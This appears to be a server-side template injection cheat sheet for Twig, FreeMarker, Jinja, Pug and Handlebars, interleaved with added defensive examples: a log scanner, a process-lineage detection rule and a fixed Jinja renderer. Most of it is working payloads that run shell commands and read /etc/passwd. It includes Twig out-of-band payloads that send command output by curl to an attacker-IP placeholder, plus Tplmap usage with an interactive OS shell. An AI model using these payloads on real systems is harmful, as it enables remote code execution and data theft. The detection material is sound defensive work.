Template engines
Template engine | Language | Server / client side
General SSTI identification
# general payloads
{1234*2}
{1234+1234}
%{1234*2}
%{1234+1234}
<%= 1234*2 %>
<%= 1234+1234 %>
${1234*2}
${1234+1234}
{{1234*2}}
{{1234+1234}}
#{1234*2}
#{1234+1234}
@{1234*2}
@{1234+1234}
@(1234*2)
@(1234+1234)
# identification
2468
2,468
2.468
<2468>
# error payloads
${{<%[%'"}}%\.
<%= foobar %>
Decision tree for identifying the template engine
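The probe strings listed above are also what a defender should look for in request logs. The following is an added example, not part of the original cheat sheet: a small Python scanner that decodes the query parameters of constructed access-log lines and flags values that open a template delimiter around arithmetic an engine would fold, values that contain identifiers used by the exploitation payloads on this page, and the error-probe polyglot that opens several engines' delimiters at once. The log lines, client addresses and verdict labels are constructed for the example; the rules are heuristics, not a complete signature set.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Delimiter pairs from the general payload list, as (opener, closer) regexes.
# The bare-brace pair comes last and is only trusted for arithmetic.
DELIMITERS = [
    (r"\{\{", r"\}\}"),  # {{ }}   Twig, Jinja, Handlebars
    (r"\$\{", r"\}"),    # ${ }    FreeMarker
    (r"%\{", r"\}"),     # %{ }
    (r"<%=", r"%>"),     # <%= %>  ERB-style
    (r"#\{", r"\}"),     # #{ }    Pug / Jade
    (r"@\{", r"\}"),     # @{ }
    (r"@\(", r"\)"),     # @( )
    (r"\{", r"\}"),      # { }
]
OPENERS = ("{{", "${", "%{", "<%", "#{", "@{", "@(")

# 1234*2, 1234+'1234', "2468"*3: a numeric expression an engine would fold.
ARITH = re.compile(r"""['"]?\d+['"]?\s*[*+/-]\s*['"]?\d+['"]?""")
# Identifiers that occur in the exploitation payloads on this page.
DANGEROUS = re.compile(
    r"__class__|__subclasses__|__builtins__|freemarker\.template\.utility\.Execute"
    r"|mainModule|child_process|\breaddir\b|config\|pprint"
    r"|\bsystem\b|\bpassthru\b|\bpopen\b|/etc/passwd"
)


def classify(value: str) -> Optional[str]:
    """Verdict for one decoded parameter value, or None when it looks benign."""
    # The error-probe polyglot opens several engines' delimiters in one string.
    if sum(op in value for op in OPENERS) >= 3:
        return "polyglot-error-probe"
    for opener, closer in DELIMITERS:
        for m in re.finditer(opener + r"(.*?)" + closer, value, re.S):
            inner = m.group(1)
            if DANGEROUS.search(inner):
                return "dangerous-expression"
            if ARITH.search(inner):
                return "arithmetic-probe"
    return None


# Combined log format: client address, request line and status are enough here.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client, parameter, verdict) for every flagged query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            verdict = classify(value)
            if verdict:
                hits.append((m.group("client"), name, verdict))
    return hits


# Constructed sample lines (not real traffic); the probes are the page's strings, URL-encoded.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?name=%7B%7B1234*2%7D%7D HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?name=%7B%7B%5B0%5D%7Creduce(%27system%27,%27id%27)%7D%7D HTTP/1.1" 200 600 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?name=alice HTTP/1.1" 200 480 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25%5C. HTTP/1.1" 500 0 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?name=Bob+%7Bsmith%7D HTTP/1.1" 200 490 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /search?q=%7B%7B%222468%22*3%7D%7D HTTP/1.1" 200 520 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for client, param, verdict in scan_access_log(SAMPLE_LOG):
        print(f"{client} {param}: {verdict}")
```

Access logs carry only the query string, so the same `classify` check has to run at the reverse proxy or WAF to cover POST bodies and headers. One client sending an arithmetic probe followed by a dangerous expression, as in the sample, is the sequence the decision tree above produces and is worth alerting on as a whole rather than per request.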
Twig
General identification.
{{1234*'2'}}
2468
{{-2468-}}
2468
General payloads.
{{1234*2}}
{{1234*'2'}}
{{1234+1234}}
{{1234+'1234'}}
{{-2468-}}
{{[0]|reduce('system','id')}}
{{[0]|reduce('passthru','id')}}
{{[0]|reduce('system','cat /etc/passwd')}}
{{[0]|reduce('passthru','cat /etc/passwd')}}
{{['id']|filter('system')}}
{{['id']|filter('passthru')}}
{{['cat /etc/passwd']|filter('system')}}
{{['cat /etc/passwd']|filter('passthru')}}
{{['id']|map('system')|join}}
{{['id']|map('passthru')}}
{{['cat /etc/passwd']|map('system')|join}}
{{['cat /etc/passwd']|map('passthru')|join}}
Out-of-band (blind)
Starting an HTTP server.
python -m SimpleHTTPServer <port>
python3 -m http.server <port>
Out-of-band (blind) SSTI identification.
{{[0]|reduce('system','curl http://<attacker-IP-address>/oob')}}
Command execution.
{% set output %}
{{[0]|reduce('system','id')}}
{% endset %}
{% set exfil = output| url_encode %}
{{[0]|reduce('system','curl http://<attacker-IP-address>/?oob=' ~ exfil)}}
File reading.
{% set output %}
{{[0]|reduce('system','cat /etc/passwd')}}
{% endset %}
{% set exfil = output| url_encode %}
{{[0]|reduce('system','curl http://<attacker-IP-address>/?oob=' ~ exfil)}}
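Every payload in the out-of-band section above ends the same way on the server: the PHP worker calls system() or passthru(), which spawns sh -c, which runs id, cat or curl towards the attacker's listener. That process lineage is the most reliable host-side signal for this class of attack. The following is an added example, not part of the original page: a rule over constructed process-creation events (a simplified shape with pid, comm, argv and the chain of ancestor process names, as an EDR or auditd pipeline would provide) that flags shells, egress tools and sensitive file reads descended from the web server. The process names, pids and events are constructed for the example and would be tuned per environment.

```python
from typing import Dict, List, Optional, Tuple

# Process names that serve the application (assumption: tune to the environment).
WEB_SERVERS = {"php-fpm", "apache2", "httpd", "nginx", "node", "gunicorn", "java"}
SHELLS = {"sh", "bash", "dash"}
EGRESS_TOOLS = {"curl", "wget", "nc"}


def check_spawn(event: Dict) -> Optional[str]:
    """Label one process-creation event, or return None when it is expected."""
    if not set(event["ancestors"]) & WEB_SERVERS:
        return None  # not descended from the application process
    comm = event["comm"]
    argv = " ".join(event["argv"])
    if comm in EGRESS_TOOLS and ("http://" in argv or "https://" in argv):
        return "web-server-egress"  # the curl http://<attacker>/?oob=... exfiltration step
    if comm in SHELLS:
        return "web-server-shell"  # system()/passthru() run their command through sh -c
    if comm == "cat" and "/etc/passwd" in argv:
        return "web-server-sensitive-read"
    return None


def scan_events(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (pid, label) for every event the rule flags, in input order."""
    hits = []
    for event in events:
        label = check_spawn(event)
        if label:
            hits.append((event["pid"], label))
    return hits


# Constructed sample events: the first three are what the Twig payloads above
# produce on the host; the last two are normal activity that must not alert.
SAMPLE_EVENTS = [
    {"pid": 4012, "comm": "sh", "argv": ["sh", "-c", "id"],
     "ancestors": ["php-fpm", "systemd"]},
    {"pid": 4013, "comm": "curl",
     "argv": ["curl", "http://198.51.100.7/?oob=uid%3D33%28www-data%29"],
     "ancestors": ["sh", "php-fpm", "systemd"]},
    {"pid": 4014, "comm": "cat", "argv": ["cat", "/etc/passwd"],
     "ancestors": ["sh", "php-fpm", "systemd"]},
    {"pid": 4015, "comm": "php-fpm", "argv": ["php-fpm: pool www"],
     "ancestors": ["php-fpm", "systemd"]},
    {"pid": 4016, "comm": "curl", "argv": ["curl", "https://updates.example.invalid/"],
     "ancestors": ["bash", "sshd", "systemd"]},
]

if __name__ == "__main__":
    for pid, label in scan_events(SAMPLE_EVENTS):
        print(pid, label)
```

Applications that legitimately shell out (image conversion, PDF generation) will need an allow-list on argv rather than on the shell itself; the egress rule is the one with the fewest benign matches, because an application worker rarely has a reason to start curl with an arbitrary URL, and blocking outbound connections from the web tier at the network level removes the blind exfiltration channel entirely.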
Apache FreeMarker
General identification.
${1234*2}
2,468
2.468
${1234*2}
${1234+1234}
${"freemarker.template.utility.Execute"?new()("id")}
${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
Jinja
General identification.
{{"2468"*3}}
246824682468
{{1234*2}}
{{1234+1234}}
{{config|pprint}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("id").read()}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("cat /etc/passwd").read()}}{%endif%}{% endfor %}
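What makes the Jinja payloads above work is that the user's value reaches the engine as template source instead of as data. The following is an added example, not code from the page or from the Jinja project, and it assumes the jinja2 package is installed: the vulnerable render beside the fixed one, plus jinja2's SandboxedEnvironment, which refuses the underscore attribute walk but still evaluates {{1234*2}}, so it is defence in depth and not a replacement for passing input as a variable.

```python
from jinja2 import Template
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed inputs: the arithmetic probe and the attribute walk from the payloads above.
PROBE = "{{1234*2}}"
WALK = "{{ ().__class__.__base__.__subclasses__() }}"


def render_vulnerable(user_input: str) -> str:
    """Vulnerable: the user value is concatenated into the template source,
    so the engine parses and evaluates whatever delimiters it contains."""
    return Template("Hello " + user_input).render()


def render_fixed(user_input: str) -> str:
    """Fixed: the template is a constant and the user value is a context
    variable, so it is printed literally (and escaped if autoescape is on)."""
    return Template("Hello {{ name }}").render(name=user_input)


def render_sandboxed(user_input: str) -> str:
    """Defence in depth only: the sandbox rejects unsafe attribute access such
    as __class__, but still evaluates expressions, so the bug itself remains."""
    env = SandboxedEnvironment()
    try:
        return env.from_string("Hello " + user_input).render()
    except SecurityError:
        return "Hello [blocked by sandbox]"


if __name__ == "__main__":
    for fn in (render_vulnerable, render_fixed, render_sandboxed):
        print(fn.__name__, repr(fn(PROBE)), repr(fn(WALK))[:60])
```

The check a reviewer should make is mechanical: grep for Template(, from_string( and render_template_string( and confirm that none of their first arguments is built from request data. The same rule applies to every engine on this page; Twig's createTemplate(), FreeMarker's new Template(...) with a user string and Pug's compile() on user input are the equivalent sinks.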
Pug / Jade
General identification.
#{1234*2}
#{1234*'2'}
#{1234+1234}
#{global.process.mainModule.require('child_process').spawnSync('id').stdout}
#{global.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
Handlebars
{{#each (readdir "/etc")}}
{{this}}
{{/each}}
{{read "/etc/passwd"}}
Automated tools
Tplmap
Installation.
git clone https://github.com/epinna/tplmap.git
cd tplmap
pip install virtualenv
virtualenv -p python2 virtualenv-tplmap
source virtualenv-tplmap/bin/activate
pip install -r requirements.txt
./tplmap.py
Using the tool.
# GET method
./tplmap.py -u "http://<target>/index.php?<parameter>=value*"
# POST method
./tplmap.py -u "http://<target>" -d <parameter>="value*"
# Command execution
--os-cmd=<command>
# Interactive shell
--os-shell